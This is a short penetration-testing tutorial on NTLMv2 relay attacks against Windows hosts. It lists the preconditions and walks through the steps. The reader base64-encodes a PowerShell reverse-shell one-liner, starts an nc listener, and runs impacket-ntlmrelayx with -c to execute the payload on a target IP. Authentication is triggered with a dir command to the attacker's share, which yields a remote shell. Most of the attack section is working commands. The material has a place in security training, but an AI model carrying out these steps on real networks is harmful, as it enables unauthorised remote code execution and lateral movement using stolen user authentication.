NTLMv2 relay
If you can capture a user's Net-NTLMv2 authentication but cracking the password is not feasible (for example because the password is too complex), you do not need the password at all: the authentication can be relayed to another Windows host and used to access resources there as that user. Note that a captured Net-NTLMv2 challenge/response is not the NT hash and cannot be used for pass-the-hash; cracking it or relaying it are the only options.
Conditions
- You need a way to make the victim user authenticate to the attack machine, i.e. some initial access to that machine or user (in the steps below this is a dir \\attacker\share run as that user).
- The host you relay to must not require SMB signing; if signing is enforced the relayed session is rejected.
- The relay target must be a different host from the one the authentication comes from; relaying back to the origin host is blocked.
- To execute a command on the target with -c, the relayed user needs local administrator rights on that target.
How to perform this attack
Follow the steps below to achieve this
- Start from a PowerShell reverse-shell one-liner that connects back to the attack machine on the listener port used below.
- Encode it as base64 for powershell -enc. PowerShell expects the base64 of the UTF-16LE bytes of the script, so convert before encoding; a plain echo | base64 encodes the UTF-8 bytes and the resulting argument will not decode.
echo -n '<Powershell one liner>' | iconv -t UTF-16LE | base64 -w 0
- Set up the listener for the reverse shell on the attack machine (port 80 here):
sudo nc -nvlp 80
- Use impacket-ntlmrelayx to perform the relay attack and run the encoded payload on the target (192.168.1.1) via -c. --no-http-server is used because only the SMB listener is needed for this trigger:
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.1.1 -c "powershell -enc GNsaWVudCA9IE5ldy1PYmplY3Q..."
- Trigger the authentication: from the victim machine, as the user whose authentication you want to relay, connect to the attack machine (192.168.10.5). The share name does not have to exist; the SMB authentication is what gets relayed, and the reverse shell from the target arrives in the nc listener:
dir \\192.168.10.5\testing